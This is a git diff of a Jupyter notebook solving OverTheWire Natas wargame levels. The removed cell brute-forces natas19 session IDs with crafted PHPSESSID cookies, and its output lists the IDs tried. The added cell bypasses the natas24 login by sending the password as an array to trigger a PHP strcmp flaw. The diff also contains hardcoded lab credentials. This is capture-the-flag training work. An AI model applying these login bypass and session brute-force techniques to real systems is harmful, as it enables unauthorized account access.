--- a/Natas/natas24.ipynb
+++ b/Natas/natas24.ipynb
@@ -2,165 +2,41 @@
  "cells": [
   {
    "cell_type": "code",
-   "execution_count": 9,
+   "execution_count": 6,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "testing session id 0\n",
-      "testing session id 1\n",
-      "testing session id 2\n",
-      "testing session id 3\n",
-      "testing session id 4\n",
-      "testing session id 5\n",
-      "testing session id 6\n",
-      "testing session id 7\n",
-      "testing session id 8\n",
-      "testing session id 9\n",
-      "testing session id 10\n",
-      "testing session id 11\n",
-      "testing session id 12\n",
-      "testing session id 13\n",
-      "testing session id 14\n",
-      "testing session id 15\n",
-      "testing session id 16\n",
-      "testing session id 17\n",
-      "testing session id 18\n",
-      "testing session id 19\n",
-      "testing session id 20\n",
-      "testing session id 21\n",
-      "testing session id 22\n",
-      "testing session id 23\n",
-      "testing session id 24\n",
-      "testing session id 25\n",
-      "testing session id 26\n",
-      "testing session id 27\n",
-      "testing session id 28\n",
-      "testing session id 29\n",
-      "testing session id 30\n",
-      "testing session id 31\n",
-      "testing session id 32\n",
-      "testing session id 33\n",
-      "testing session id 34\n",
-      "testing session id 35\n",
-      "testing session id 36\n",
-      "testing session id 37\n",
-      "testing session id 38\n",
-      "testing session id 39\n",
-      "testing session id 40\n",
-      "testing session id 41\n",
-      "testing session id 42\n",
-      "testing session id 43\n",
-      "testing session id 44\n",
-      "testing session id 45\n",
-      "testing session id 46\n",
-      "testing session id 47\n",
-      "testing session id 48\n",
-      "testing session id 49\n",
-      "testing session id 50\n",
-      "testing session id 51\n",
-      "testing session id 52\n",
-      "testing session id 53\n",
-      "testing session id 54\n",
-      "testing session id 55\n",
-      "testing session id 56\n",
-      "testing session id 57\n",
-      "testing session id 58\n",
-      "testing session id 59\n",
-      "testing session id 60\n",
-      "testing session id 61\n",
-      "testing session id 62\n",
-      "testing session id 63\n",
-      "testing session id 64\n",
-      "testing session id 65\n",
-      "testing session id 66\n",
-      "testing session id 67\n",
-      "testing session id 68\n",
-      "testing session id 69\n",
-      "testing session id 70\n",
-      "testing session id 71\n",
-      "testing session id 72\n",
-      "testing session id 73\n",
-      "testing session id 74\n",
-      "testing session id 75\n",
-      "testing session id 76\n",
-      "testing session id 77\n",
-      "testing session id 78\n",
-      "testing session id 79\n",
-      "testing session id 80\n",
-      "testing session id 81\n",
-      "testing session id 82\n",
-      "testing session id 83\n",
-      "testing session id 84\n",
-      "testing session id 85\n",
-      "testing session id 86\n",
-      "testing session id 87\n",
-      "testing session id 88\n",
-      "testing session id 89\n",
-      "testing session id 90\n",
-      "testing session id 91\n",
-      "testing session id 92\n",
-      "testing session id 93\n",
-      "testing session id 94\n",
-      "testing session id 95\n",
-      "testing session id 96\n",
-      "testing session id 97\n",
-      "testing session id 98\n",
-      "testing session id 99\n",
-      "testing session id 100\n",
-      "testing session id 101\n",
-      "testing session id 102\n",
-      "testing session id 103\n",
-      "testing session id 104\n",
-      "testing session id 105\n",
-      "testing session id 106\n",
-      "testing session id 107\n",
-      "testing session id 108\n",
-      "testing session id 109\n",
-      "testing session id 110\n",
-      "testing session id 111\n",
-      "testing session id 112\n",
-      "testing session id 113\n",
-      "testing session id 114\n",
-      "testing session id 115\n",
-      "testing session id 116\n",
-      "testing session id 117\n",
-      "testing session id 118\n",
-      "testing session id 119\n",
-      "testing session id 120\n",
-      "testing session id 121\n",
-      "testing session id 122\n",
-      "testing session id 123\n",
-      "testing session id 124\n",
-      "testing session id 125\n",
-      "testing session id 126\n",
-      "testing session id 127\n",
-      "testing session id 128\n",
-      "testing session id 129\n",
-      "testing session id 130\n",
-      "testing session id 131\n",
-      "testing session id 132\n",
-      "testing session id 133\n",
-      "testing session id 134\n",
-      "testing session id 135\n",
-      "testing session id 136\n",
-      "testing session id 137\n",
-      "testing session id 138\n",
-      "testing session id 139\n",
-      "testing session id 140\n",
-      "testing session id 141\n",
-      "testing session id 142\n",
-      "testing session id 143\n",
-      "testing session id 144\n",
-      "testing session id 145\n",
-      "testing session id 146\n",
-      "testing session id 147\n",
-      "testing session id 148\n",
-      "testing session id 149\n",
-      "testing session id 150\n",
-      "testing session id 151\n"
+      "<html>\n",
+      "<head>\n",
+      "<!-- This stuff in the header has nothing to do with the level -->\n",
+      "<link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
+      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
+      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/wechall-data.js\"></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
+      "<script>var wechallinfo = { \"level\": \"natas24\", \"pass\": \"0xzF30T9Av8lgXhW7slhFCIsVKAPyl2r\" };</script></head>\n",
+      "<body>\n",
+      "<h1>natas24</h1>\n",
+      "<div id=\"content\">\n",
+      "\n",
+      "Password:\n",
+      "<form name=\"input\" method=\"get\">\n",
+      "    <input type=\"text\" name=\"passwd\" size=20>\n",
+      "    <input type=\"submit\" value=\"Login\">\n",
+      "</form>\n",
+      "\n",
+      "<br />\n",
+      "<b>Warning</b>:  strcmp() expects parameter 1 to be string, array given in <b>/var/www/natas/natas24/index.php</b> on line <b>23</b><br />\n",
+      "<br>The credentials for the next level are:<br><pre>Username: natas25 Password: O9QD9DZBDq1YpswiTM5oqMDaOtuZtAcx</pre>  \n",
+      "<div id=\"viewsource\"><a href=\"index-source.html\">View sourcecode</a></div>\n",
+      "</div>\n",
+      "</body>\n",
+      "</html>\n",
+      "\n"
      ]
     }
    ],
@@ -168,18 +44,11 @@
     "import requests\n",
     "from IPython.display import clear_output\n",
     "\n",
-    "url = f'http://natas19.natas.labs.overthewire.org/index.php?debug=1&username=admin&password=test'\n",
-    "for i in range(641):\n",
-    "    key = f'{i}-admin'.encode('utf-8').hex()\n",
-    "    cookies = dict(PHPSESSID=key)\n",
-    "    result = requests.get(url, auth=(\"natas19\", \"8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s\"), cookies=cookies)\n",
-    "    if 'Username: natas20' in result.text:\n",
-    "        clear_output()\n",
-    "        print(len(result.text))\n",
-    "        print(result.text)\n",
-    "        print(result.cookies.get_dict())\n",
-    "        break\n",
-    "    print(f'testing session id {i}, key: {key}')"
+    "passwd = ''\n",
+    "\n",
+    "url = f'http://natas24.natas.labs.overthewire.org?passwd[]={passwd}'\n",
+    "result = requests.get(url, auth=(\"natas24\", \"0xzF30T9Av8lgXhW7slhFCIsVKAPyl2r\"))\n",
+    "print(result.text)"
    ]
   }
  ],
